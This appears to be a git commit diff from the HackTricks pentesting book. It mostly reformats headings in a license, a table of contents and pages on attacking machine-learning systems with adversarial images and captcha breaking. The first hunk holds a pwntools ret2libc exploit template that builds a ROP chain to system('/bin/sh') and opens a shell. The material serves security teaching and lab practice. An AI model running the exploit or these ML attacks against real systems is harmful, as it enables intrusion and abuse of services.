Commit dd633218bb by carlospolop, 2022-05-01 13:41:36 +01:00 (parent: 71f97f5e77)
351 changed files with 4559 additions and 5199 deletions


@@ -1,9 +1,9 @@
 from pwn import * # Import pwntools
-####################
-#### CONNECTION ####
-####################
+###################
+### CONNECTION ####
+###################
 LOCAL = True
 REMOTETTCP = False
 REMOTESSH = False
@@ -36,9 +36,9 @@ if GDB:
 gdb.attach(p.pid, "continue")
-####################
-#### Find offset ###
-####################
+###################
+### Find offset ###
+###################
 OFFSET = "A"*40
 if OFFSET == "":
 gdb.attach(p.pid, "c") #Attach and continue
@@ -51,9 +51,9 @@ if OFFSET == "":
 exit()
-#####################
-#### Find Gadgets ###
-#####################
+####################
+### Find Gadgets ###
+####################
 PUTS_PLT = elf.plt['puts'] #PUTS_PLT = elf.symbols["puts"] # This is also valid to call puts
 MAIN_PLT = elf.symbols['main']
 POP_RDI = (rop.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi"
@@ -93,9 +93,9 @@ if libc == "":
 # this implies that in the future if you search for functions in libc, the resulting address
 # will be the real one, you can use it directly (NOT NEED TO ADD AGAINF THE LIBC BASE ADDRESS)
-#################################
-### GET SHELL with known LIBC ###
-#################################
+################################
+## GET SHELL with known LIBC ###
+################################
 BINSH = next(libc.search("/bin/sh")) #Verify with find /bin/sh
 SYSTEM = libc.sym["system"]
 EXIT = libc.sym["exit"]
@@ -108,5 +108,5 @@ rop2 = OFFSET + p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) + p64(EXIT)
 p.clean()
 p.sendline(rop2)
-##### Interact with the shell #####
+#### Interact with the shell #####
 p.interactive() #Interact with the conenction
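Not part of the diff itself, but for context: the `rop2` line in the last hunk builds a classic `system("/bin/sh")` ROP chain. Below is a minimal pure-Python sketch of what that line assembles, with `struct.pack` standing in for pwntools' `p64` and made-up addresses (in a real run they come from `elf.plt`, `libc.sym`, and `rop.find_gadget`).

```python
import struct

def p64(addr):
    # Pack an address as 8 little-endian bytes, like pwntools' p64
    return struct.pack("<Q", addr)

# Hypothetical addresses for illustration only
OFFSET  = b"A" * 40           # padding up to the saved return address
POP_RDI = 0x00000000004011fb  # 'pop rdi; ret' gadget
BINSH   = 0x00007f0000123456  # address of "/bin/sh" inside libc
SYSTEM  = 0x00007f0000045678  # libc system()
EXIT    = 0x00007f0000043210  # libc exit(), so the process dies cleanly

# x86-64 SysV ABI: the first argument travels in RDI, so the chain is
# pop rdi; ret -> "/bin/sh" -> system -> exit
rop2 = OFFSET + p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) + p64(EXIT)
assert len(rop2) == 40 + 4 * 8
```

The overflow overwrites the saved return address with the gadget, the gadget pops the `"/bin/sh"` pointer into RDI, and execution then "returns" into `system`.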


@@ -16,7 +16,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 </details>
-## 1911 - Pentesting fox
 And more services:


@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 </details>
-# 6881/udp - Pentesting BitTorrent
 <details>


@@ -24,13 +24,13 @@ Human Readable License: https://creativecommons.org/licenses/by-nc/4.0/<br>
 Complete Legal Terms: https://creativecommons.org/licenses/by-nc/4.0/legalcode<br>
 Formatting: https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/master/licenses/by-nc.markdown<br>
-## creative commons
+# creative commons
 # Attribution-NonCommercial 4.0 International
 Creative Commons Corporation (“Creative Commons”) is not a law firm and does not provide legal services or legal advice. Distribution of Creative Commons public licenses does not create a lawyer-client or other relationship. Creative Commons makes its licenses and related information available on an “as-is” basis. Creative Commons gives no warranties regarding its licenses, any material licensed under their terms and conditions, or any related information. Creative Commons disclaims all liability for damages resulting from their use to the fullest extent possible.
-### Using Creative Commons Public Licenses
+## Using Creative Commons Public Licenses
 Creative Commons public licenses provide a standard set of terms and conditions that creators and other rights holders may use to share original works of authorship and other material subject to copyright and certain other rights specified in the public license below. The following considerations are for informational purposes only, are not exhaustive, and do not form part of our licenses.
@@ -38,11 +38,11 @@ Creative Commons public licenses provide a standard set of terms and conditions
 * __Considerations for the public:__ By using one of our public licenses, a licensor grants the public permission to use the licensed material under specified terms and conditions. If the licensor's permission is not necessary for any reason – for example, because of any applicable exception or limitation to copyright – then that use is not regulated by the license. Our licenses grant only permissions under copyright and certain other rights that a licensor has authority to grant. Use of the licensed material may still be restricted for other reasons, including because others have copyright or other rights in the material. A licensor may make special requests, such as asking that all changes be marked or described. Although not required by our licenses, you are encouraged to respect those requests where reasonable. [More considerations for the public](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees).
-## Creative Commons Attribution-NonCommercial 4.0 International Public License
+# Creative Commons Attribution-NonCommercial 4.0 International Public License
 By exercising the Licensed Rights (defined below), You accept and agree to be bound by the terms and conditions of this Creative Commons Attribution-NonCommercial 4.0 International Public License ("Public License"). To the extent this Public License may be interpreted as a contract, You are granted the Licensed Rights in consideration of Your acceptance of these terms and conditions, and the Licensor grants You such rights in consideration of benefits the Licensor receives from making the Licensed Material available under these terms and conditions.
-### Section 1 – Definitions.
+## Section 1 – Definitions.
 a. __Adapted Material__ means material subject to Copyright and Similar Rights that is derived from or based upon the Licensed Material and in which the Licensed Material is translated, altered, arranged, transformed, or otherwise modified in a manner requiring permission under the Copyright and Similar Rights held by the Licensor. For purposes of this Public License, where the Licensed Material is a musical work, performance, or sound recording, Adapted Material is always produced where the Licensed Material is synched in timed relation with a moving image.
@@ -68,7 +68,7 @@ k. __Sui Generis Database Rights__ means rights other than copyright resulting f
 l. __You__ means the individual or entity exercising the Licensed Rights under this Public License. __Your__ has a corresponding meaning.
-### Section 2 – Scope.
+## Section 2 – Scope.
 a. ___License grant.___
@@ -100,7 +100,7 @@ b. ___Other rights.___
 3. To the extent possible, the Licensor waives any right to collect royalties from You for the exercise of the Licensed Rights, whether directly or through a collecting society under any voluntary or waivable statutory or compulsory licensing scheme. In all other cases the Licensor expressly reserves any right to collect such royalties, including when the Licensed Material is used other than for NonCommercial purposes.
-### Section 3 – License Conditions.
+## Section 3 – License Conditions.
 Your exercise of the Licensed Rights is expressly made subject to the following conditions.
@@ -130,7 +130,7 @@ a. ___Attribution.___
 4. If You Share Adapted Material You produce, the Adapter's License You apply must not prevent recipients of the Adapted Material from complying with this Public License.
-### Section 4 – Sui Generis Database Rights.
+## Section 4 – Sui Generis Database Rights.
 Where the Licensed Rights include Sui Generis Database Rights that apply to Your use of the Licensed Material:
@@ -142,7 +142,7 @@ c. You must comply with the conditions in Section 3(a) if You Share all or a sub
 For the avoidance of doubt, this Section 4 supplements and does not replace Your obligations under this Public License where the Licensed Rights include other Copyright and Similar Rights.
-### Section 5 – Disclaimer of Warranties and Limitation of Liability.
+## Section 5 – Disclaimer of Warranties and Limitation of Liability.
 a. __Unless otherwise separately undertaken by the Licensor, to the extent possible, the Licensor offers the Licensed Material as-is and as-available, and makes no representations or warranties of any kind concerning the Licensed Material, whether express, implied, statutory, or other. This includes, without limitation, warranties of title, merchantability, fitness for a particular purpose, non-infringement, absence of latent or other defects, accuracy, or the presence or absence of errors, whether or not known or discoverable. Where disclaimers of warranties are not allowed in full or in part, this disclaimer may not apply to You.__
@@ -150,7 +150,7 @@ b. __To the extent possible, in no event will the Licensor be liable to You on a
 c. The disclaimer of warranties and limitation of liability provided above shall be interpreted in a manner that, to the extent possible, most closely approximates an absolute disclaimer and waiver of all liability.
-### Section 6 – Term and Termination.
+## Section 6 – Term and Termination.
 a. This Public License applies for the term of the Copyright and Similar Rights licensed here. However, if You fail to comply with this Public License, then Your rights under this Public License terminate automatically.
@@ -166,13 +166,13 @@ c. For the avoidance of doubt, the Licensor may also offer the Licensed Material
 d. Sections 1, 5, 6, 7, and 8 survive termination of this Public License.
-### Section 7 – Other Terms and Conditions.
+## Section 7 – Other Terms and Conditions.
 a. The Licensor shall not be bound by any additional or different terms or conditions communicated by You unless expressly agreed.
 b. Any arrangements, understandings, or agreements regarding the Licensed Material not stated herein are separate from and independent of the terms and conditions of this Public License.
-### Section 8 – Interpretation.
+## Section 8 – Interpretation.
 a. For the avoidance of doubt, this Public License does not, and shall not be interpreted to, reduce, limit, restrict, or impose conditions on any use of the Licensed Material that could lawfully be made without permission under this Public License.


@@ -1,24 +1,24 @@
 # Learning Pages and VMs
-## https://tryhackme.com/
+# https://tryhackme.com/
 Tryhackme is a platform with virtual machines that need to be solved through walkthroughs, which is very good for beginners and normal CTFs where you self must hack into the machines.
-## https://www.root-me.org/
+# https://www.root-me.org/
 Rootme is another page for online hosted virtual machines to hack.
-## https://www.vulnhub.com/
+# https://www.vulnhub.com/
 Vulnhub has machines to download and then to hack
-## https://www.hackthebox.eu/ https://academy.hackthebox.eu/catalogue
+# https://www.hackthebox.eu/ https://academy.hackthebox.eu/catalogue
 Hackthebox has online machines to hack, but there are very limited in the free version.
@@ -26,26 +26,26 @@ Recently the launched their academy, but it is a bit more expensive than for exa
-## https://hack.me/
+# https://hack.me/
 This site seems to be a community platform
-## https://www.hacker101.com/
+# https://www.hacker101.com/
 Free and smale site with videos and CTFs
-## https://crackmes.one/
+# https://crackmes.one/
 This site has a lot of binarys for forensic learning.
-## https://overthewire.org/wargames/
+# https://overthewire.org/wargames/
 The wargames offered by the OverTheWire community can help you to learn and practice security concepts in the form of fun-filled games.
 Perfect for beginners.
-## https://www.hackthissite.org/missions/basic/
+# https://www.hackthissite.org/missions/basic/
-## https://attackdefense.com/
+# https://attackdefense.com/


@@ -22,7 +22,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 </details>
-## HackTricks
 ![](.gitbook/assets/p.png)
@@ -30,13 +29,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 Here you can find a little **introduction:**
-### [**Pentesting Methodology**](pentesting-methodology.md)
+## [**Pentesting Methodology**](pentesting-methodology.md)
 Here you will find the **typical flow** that **you should follow when pentesting** one or more **machines**.
 **Click in the title to start!**
-### Support HackTricks
+## Support HackTricks
 Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
@@ -46,9 +45,9 @@ And if you are a PEASS & HackTricks enthusiast, you can get your hands now on ou
 You can also, **join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **to learn about latest news in cybersecurity and meet other cybersecurity enthusiasts**, or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
 If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book.
-### Corporate Sponsors
+## Corporate Sponsors
-#### [STM Cyber](https://www.stmcyber.com)
+### [STM Cyber](https://www.stmcyber.com)
 ![](<.gitbook/assets/image (642) (1) (1) (1).png>)
@@ -58,7 +57,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
 **STM Cyber** also support cybersecurity open source projects like HackTricks :)
-#### [Intrigiti](https://www.intigriti.com)
+### [Intrigiti](https://www.intigriti.com)
 ![](<.gitbook/assets/image (638).png>)
@@ -68,7 +67,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
 {% embed url="https://go.intigriti.com/hacktricks" %}
-#### [**INE**](https://ine.com)
+### [**INE**](https://ine.com)
 ![](.gitbook/assets/ine\_logo-3-.jpg)
@@ -84,7 +83,7 @@ You can find **my reviews of the certifications eMAPT and eWPTXv2** (and their *
 [ine-courses-and-elearnsecurity-certifications-reviews.md](courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md)
 {% endcontent-ref %}
-### License
+## License
 **Copyright © Carlos Polop 2021. Except where otherwise specified (the external information copied into the book belongs to the original authors), the text on** [**HACK TRICKS**](https://github.com/carlospolop/hacktricks) **by Carlos Polop is licensed under the**[ **Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)**](https://creativecommons.org/licenses/by-nc/4.0/)**.**\
 **If you want to use it with commercial purposes, contact me.**


@@ -15,7 +15,7 @@
 * [Tunneling and Port Forwarding](tunneling-and-port-forwarding.md)
 * [Search Exploits](search-exploits.md)
-## Shells
+# Shells
 * [Shells (Linux, Windows, MSFVenom)](shells/shells/README.md)
 * [MSFVenom - CheatSheet](shells/shells/msfvenom.md)
@@ -23,7 +23,7 @@
 * [Shells - Linux](shells/shells/linux.md)
 * [Full TTYs](shells/shells/full-ttys.md)
-## Linux/Unix
+# Linux/Unix
 * [Checklist - Linux Privilege Escalation](linux-unix/linux-privilege-escalation-checklist.md)
 * [Linux Privilege Escalation](linux-unix/privilege-escalation/README.md)
@@ -62,7 +62,7 @@
 * [Bypass Bash Restrictions](linux-unix/useful-linux-commands/bypass-bash-restrictions.md)
 * [Linux Environment Variables](linux-unix/linux-environment-variables.md)
-## MacOS
+# MacOS
 * [MacOS Security & Privilege Escalation](macos/macos-security-and-privilege-escalation/README.md)
 * [Mac OS Architecture](macos/macos-security-and-privilege-escalation/mac-os-architecture.md)
@@ -73,7 +73,7 @@
 * [MacOS Serial Number](macos/macos-security-and-privilege-escalation/macos-serial-number.md)
 * [MacOS Apps - Inspecting, debugging and Fuzzing](macos/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing.md)
-## Windows
+# Windows
 * [Checklist - Local Windows Privilege Escalation](windows/checklist-windows-privilege-escalation.md)
 * [Windows Local Privilege Escalation](windows/windows-local-privilege-escalation/README.md)
@@ -138,7 +138,7 @@
 * [PowerView](windows/basic-powershell-for-pentesters/powerview.md)
 * [AV Bypass](windows/av-bypass.md)
-## Mobile Apps Pentesting
+# Mobile Apps Pentesting
 * [Android APK Checklist](mobile-apps-pentesting/android-checklist.md)
 * [Android Applications Pentesting](mobile-apps-pentesting/android-app-pentesting/README.md)
@@ -185,7 +185,7 @@
 * [iOS UIPasteboard](mobile-apps-pentesting/ios-pentesting/ios-uipasteboard.md)
 * [iOS WebViews](mobile-apps-pentesting/ios-pentesting/ios-webviews.md)
-## Pentesting
+# Pentesting
 * [Pentesting Network](pentesting/pentesting-network/README.md)
 * [Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks](pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
@@ -365,7 +365,7 @@
 * [50030,50060,50070,50075,50090 - Pentesting Hadoop](pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md)
 * [Pentesting Remote GdbServer](pentesting/pentesting-remote-gdbserver.md)
-## Pentesting Web
+# Pentesting Web
 * [Web Vulnerabilities Methodology](pentesting-web/web-vulnerabilities-methodology.md)
 * [Reflecting Techniques - PoCs and Polygloths CheatSheet](pentesting-web/pocs-and-polygloths-cheatsheet/README.md)
@@ -474,7 +474,7 @@
 * [XSSI (Cross-Site Script Inclusion)](pentesting-web/xssi-cross-site-script-inclusion.md)
 * [XS-Search](pentesting-web/xs-search.md)
-## Forensics
+# Forensics
 * [Basic Forensic Methodology](forensics/basic-forensic-methodology/README.md)
 * [Baseline Monitoring](forensics/basic-forensic-methodology/file-integrity-monitoring.md)
@@ -508,7 +508,7 @@
 * [Windows Processes](forensics/basic-forensic-methodology/windows-forensics/windows-processes.md)
 * [Interesting Windows Registry Keys](forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md)
-## Cloud Security
+# Cloud Security
 * [GCP Security](cloud-security/gcp-security/README.md)
 * [GCP - Other Services Enumeration](cloud-security/gcp-security/gcp-looting.md)
@@ -559,7 +559,7 @@
 * [Cloud Security Review](cloud-security/cloud-security-review.md)
 * [AWS Security](cloud-security/aws-security.md)
-## A.I. Exploiting
+# A.I. Exploiting
 * [BRA.I.NSMASHER Presentation](a.i.-exploiting/bra.i.nsmasher-presentation/README.md)
 * [Basic Bruteforcer](a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md)
@@ -569,16 +569,16 @@
 * [ML Basics](a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/README.md)
 * [Feature Engineering](a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md)
-## Blockchain
+# Blockchain
 * [Blockchain & Crypto Currencies](blockchain/blockchain-and-crypto-currencies/README.md)
 * [Page 1](blockchain/blockchain-and-crypto-currencies/page-1.md)
-## Courses and Certifications Reviews
+# Courses and Certifications Reviews
 * [INE Courses and eLearnSecurity Certifications Reviews](courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md)
-## Physical attacks
+# Physical attacks
 * [Physical Attacks](physical-attacks/physical-attacks.md)
 * [Escaping from KIOSKs](physical-attacks/escaping-from-gui-applications/README.md)
@@ -587,7 +587,7 @@
 * [Bootloader testing](physical-attacks/firmware-analysis/bootloader-testing.md)
 * [Firmware Integrity](physical-attacks/firmware-analysis/firmware-integrity.md)
-## Reversing
+# Reversing
 * [Reversing Tools & Basic Methods](reversing/reversing-tools-basic-methods/README.md)
 * [Angr](reversing/reversing-tools-basic-methods/angr/README.md)
@@ -600,7 +600,7 @@
 * [Unpacking binaries](reversing/cryptographic-algorithms/unpacking-binaries.md)
 * [Word Macros](reversing/word-macros.md)
-## Exploiting
+# Exploiting
 * [Linux Exploiting (Basic) (SPA)](exploiting/linux-exploiting-basic-esp/README.md)
* [Format Strings Template](exploiting/linux-exploiting-basic-esp/format-strings-template.md) * [Format Strings Template](exploiting/linux-exploiting-basic-esp/format-strings-template.md)
@ -614,7 +614,7 @@
* [PwnTools](exploiting/tools/pwntools.md) * [PwnTools](exploiting/tools/pwntools.md)
* [Windows Exploiting (Basic Guide - OSCP lvl)](exploiting/windows-exploiting-basic-guide-oscp-lvl.md) * [Windows Exploiting (Basic Guide - OSCP lvl)](exploiting/windows-exploiting-basic-guide-oscp-lvl.md)
## Cryptography # Cryptography
* [Certificates](cryptography/certificates.md) * [Certificates](cryptography/certificates.md)
* [Cipher Block Chaining CBC-MAC](cryptography/cipher-block-chaining-cbc-mac-priv.md) * [Cipher Block Chaining CBC-MAC](cryptography/cipher-block-chaining-cbc-mac-priv.md)
@ -624,19 +624,19 @@
* [Padding Oracle](cryptography/padding-oracle-priv.md) * [Padding Oracle](cryptography/padding-oracle-priv.md)
* [RC4 - Encrypt\&Decrypt](cryptography/rc4-encrypt-and-decrypt.md) * [RC4 - Encrypt\&Decrypt](cryptography/rc4-encrypt-and-decrypt.md)
## BACKDOORS # BACKDOORS
* [Merlin](backdoors/merlin.md) * [Merlin](backdoors/merlin.md)
* [Empire](backdoors/empire.md) * [Empire](backdoors/empire.md)
* [Salseo](backdoors/salseo.md) * [Salseo](backdoors/salseo.md)
* [ICMPsh](backdoors/icmpsh.md) * [ICMPsh](backdoors/icmpsh.md)
## Stego # Stego
* [Stego Tricks](stego/stego-tricks.md) * [Stego Tricks](stego/stego-tricks.md)
* [Esoteric languages](stego/esoteric-languages.md) * [Esoteric languages](stego/esoteric-languages.md)
## MISC # MISC
* [Basic Python](misc/basic-python/README.md) * [Basic Python](misc/basic-python/README.md)
* [venv](misc/basic-python/venv.md) * [venv](misc/basic-python/venv.md)
@ -647,7 +647,7 @@
* [Bruteforce hash (few chars)](misc/basic-python/bruteforce-hash-few-chars.md) * [Bruteforce hash (few chars)](misc/basic-python/bruteforce-hash-few-chars.md)
* [Other Big References](misc/references.md) * [Other Big References](misc/references.md)
## TODO # TODO
* [More Tools](todo/more-tools.md) * [More Tools](todo/more-tools.md)
* [MISC](todo/misc.md) * [MISC](todo/misc.md)

View file

@ -17,18 +17,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
#BRUTEFORCER CORE SCRIPT WITH BIM ATTACK This time we introduce a new type of gradient based attack, in order to brute force an image classification app (can be shaped and used for any input of course), the BIM, or Basic Iteration Method.
This time we introduce a new type of gradient based attack, in order to brute force an image classification app (can be shaped and used for any input of course), the BIM, or Basic Iteration Method. It's recommended to see at least the explanation in the [**introduction challenge colab Notebook**](https://colab.research.google.com/drive/1lDh0oZ3TR-z87WjogdegZCdtsUuDADcR)
It's recommended to see at least the explanation in the [**introduction challenge colab Notebook**](https://colab.research.google.com/drive/1lDh0oZ3TR-z87WjogdegZCdtsUuDADcR) To go deeper on the BIM topic:
https://arxiv.org/pdf/1607.02533.pdf
To go deeper on the BIM topic:
https://arxiv.org/pdf/1607.02533.pdf As usual we will provide only the A.I. attack core part; it's up to you to complete the tool and blend it with PT techniques, depending on the situation.
As usual we will provide only the A.I. attack core part; it's up to you to complete the tool and blend it with PT techniques, depending on the situation. Please Note:
Please Note:
Remember, in these kinds of scenarios, in order to mimic real attack applications, we don't have the exact model to fool or the target image into which we would like to transform our image. That's why, in order to overcome this issue, we must blend our core script with bruteforcer logic, according to the application responses we want to fool. Remember, in these kinds of scenarios, in order to mimic real attack applications, we don't have the exact model to fool or the target image into which we would like to transform our image. That's why, in order to overcome this issue, we must blend our core script with bruteforcer logic, according to the application responses we want to fool.
<details> <details>


@ -1,40 +1,38 @@
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>
#INTERMEDIATE PYTHON SKILL, INTERMEDIATE MACHINE LEARNING SKILLS (Part 1)
#A.I. HYBRID MALWARE CLASSIFIER
##INTERMEDIATE PYTHON SKILL, INTERMEDIATE MACHINE LEARNING SKILLS (Part 1) In this series of notebooks we are going to build a **hybrid malware classifier.**
In this series of notebooks we are going to build a **hybrid malware classifier.** For the **First part** we will focus on the scripting that involves dynamic analysis. Every step of this series will come in useful for detecting malware, and in this piece we will try to classify samples based on their behaviour, using the logs produced by running a program.
For the **First part** we will focus on the scripting that involves dynamic analysis. Every step of this series will come in useful for detecting malware, and in this piece we will try to classify samples based on their behaviour, using the logs produced by running a program. In the **Second Part** we will see how to manipulate the log files in order to add robustness to our classifier and adjust the code to counter the more advanced methods of A.I. Malware Evasion.
In the **Second Part** we will see how to manipulate the log files in order to add robustness to our classifier and adjust the code to counter the more advanced methods of A.I. Malware Evasion. In the **Third Part** we will create a Static Malware Classifier.
In the **Third Part** we will create a Static Malware Classifier. For the **Fourth Part** we will add some tactics to add robustness to our Static classifier and merge it with our Dynamic Classifier.
For the **Fourth Part** we will add some tactics to add robustness to our Static classifier and merge it with our Dynamic Classifier. **PLEASE NOTE:** This Series strongly relies on building a dataset on your own, even if it's not mandatory.<br>
There are also many datasets available for Static and/or Dynamic Malware analysis on several sites for this type of classification, like Ember, VirusShare, Sorel-20M, but I strongly encourage you to build your own.
**PLEASE NOTE:** This Series strongly relies on building a dataset on your own, even if it's not mandatory.<br>
There are also many datasets available for Static and/or Dynamic Malware analysis on several sites for this type of classification, like Ember, VirusShare, Sorel-20M, but I strongly encourage you to build your own. Here's the link to our [**colab notebook**](https://colab.research.google.com/drive/1nNZLMogXF-iq-_78IvGTd-c89_C82AB8#scrollTo=lUHLMl8Pusrn), enjoy and stay safe :)
Here's the link to our [**colab notebook**](https://colab.research.google.com/drive/1nNZLMogXF-iq-_78IvGTd-c89_C82AB8#scrollTo=lUHLMl8Pusrn), enjoy and stay safe :)
<details> <details>


@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# BRA.I.NSMASHER Presentation # Presentation
## Presentation
**BrainSmasher** is a platform made with the purpose of aiding **pentesters, researchers, students, A.I. Cybersecurity engineers** to practice and learn all the techniques for **exploiting commercial A.I.** applications, by working on specifically crafted labs that reproduce several systems, like face recognition, speech recognition, ensemble image classification, autonomous drive, malware evasion, chatbot, data poisoning etc... **BrainSmasher** is a platform made with the purpose of aiding **pentesters, researchers, students, A.I. Cybersecurity engineers** to practice and learn all the techniques for **exploiting commercial A.I.** applications, by working on specifically crafted labs that reproduce several systems, like face recognition, speech recognition, ensemble image classification, autonomous drive, malware evasion, chatbot, data poisoning etc...
@ -39,7 +37,7 @@ _A big thanks to Hacktricks and Carlos Polop for giving us this opportunity_
> _Walter Miele from BrA.I.nsmasher_ > _Walter Miele from BrA.I.nsmasher_
## Registry Challenge # Registry Challenge
In order to register in [**BrA.I.Smasher** ](https://beta.brainsmasher.eu)you need to solve an easy challenge ([**here**](https://beta.brainsmasher.eu/registrationChallenge)).\ In order to register in [**BrA.I.Smasher** ](https://beta.brainsmasher.eu)you need to solve an easy challenge ([**here**](https://beta.brainsmasher.eu/registrationChallenge)).\
Just think how you can confuse one neural network while not confusing the other one, knowing that one detects the panda better while the other one is worse... Just think how you can confuse one neural network while not confusing the other one, knowing that one detects the panda better while the other one is worse...
@ -50,7 +48,7 @@ However, if at some point you **don't know how to solve** the challenge, or **ev
I have to tell you that there are **easier ways** to pass the challenge, but this **solution** is **awesome** as you will learn how to pass the challenge by crafting an **Adversarial Image with a Fast Gradient Sign Method (FGSM) attack for images.** I have to tell you that there are **easier ways** to pass the challenge, but this **solution** is **awesome** as you will learn how to pass the challenge by crafting an **Adversarial Image with a Fast Gradient Sign Method (FGSM) attack for images.**
## More Tutorials # More Tutorials
{% content-ref url="basic-captcha-breaker.md" %} {% content-ref url="basic-captcha-breaker.md" %}
[basic-captcha-breaker.md](basic-captcha-breaker.md) [basic-captcha-breaker.md](basic-captcha-breaker.md)


@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Basic Bruteforcer # BRUTEFORCER IMAGE CORRUPTION SCRIPT
## BRUTEFORCER IMAGE CORRUPTION SCRIPT
The purpose here is to introduce the user to some basic concepts about **A.I. apps exploiting**, via some easy-to-follow scripts, which represent the core for writing useful tools. The purpose here is to introduce the user to some basic concepts about **A.I. apps exploiting**, via some easy-to-follow scripts, which represent the core for writing useful tools.
In this example (which can be used to solve the easy labs of BrainSmasher), recalling also what is written in the solution for the introduction challenge, we will provide a simple yet useful way to iteratively produce corrupted images, in order to bruteforce the face recon easy labs (and thus also real applications that rely on the same principles) In this example (which can be used to solve the easy labs of BrainSmasher), recalling also what is written in the solution for the introduction challenge, we will provide a simple yet useful way to iteratively produce corrupted images, in order to bruteforce the face recon easy labs (and thus also real applications that rely on the same principles)


@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Basic Captcha Breaker
In this tutorial **a basic captcha is going to be broken**. In this tutorial **a basic captcha is going to be broken**.
A **NN is going to be trained** using several **images** that represent **letters** and then this NN is going to be used to **automatically identify the letters inside a captcha image**. A **NN is going to be trained** using several **images** that represent **letters** and then this NN is going to be used to **automatically identify the letters inside a captcha image**.


@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# BIM Bruteforcer # BRUTEFORCER CORE SCRIPT WITH BIM ATTACK
## BRUTEFORCER CORE SCRIPT WITH BIM ATTACK
This time we introduce a new type of gradient based attack, in order to brute force an image classification app \(can be shaped and used for any input of course\), the BIM, or Basic Iteration Method. This time we introduce a new type of gradient based attack, in order to brute force an image classification app \(can be shaped and used for any input of course\), the BIM, or Basic Iteration Method.


@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Hybrid Malware Classifier Part 1 # A.I. HYBRID MALWARE CLASSIFIER
## A.I. HYBRID MALWARE CLASSIFIER ## INTERMEDIATE PYTHON SKILL, INTERMEDIATE MACHINE LEARNING SKILLS \(Part 1\)
### INTERMEDIATE PYTHON SKILL, INTERMEDIATE MACHINE LEARNING SKILLS \(Part 1\)
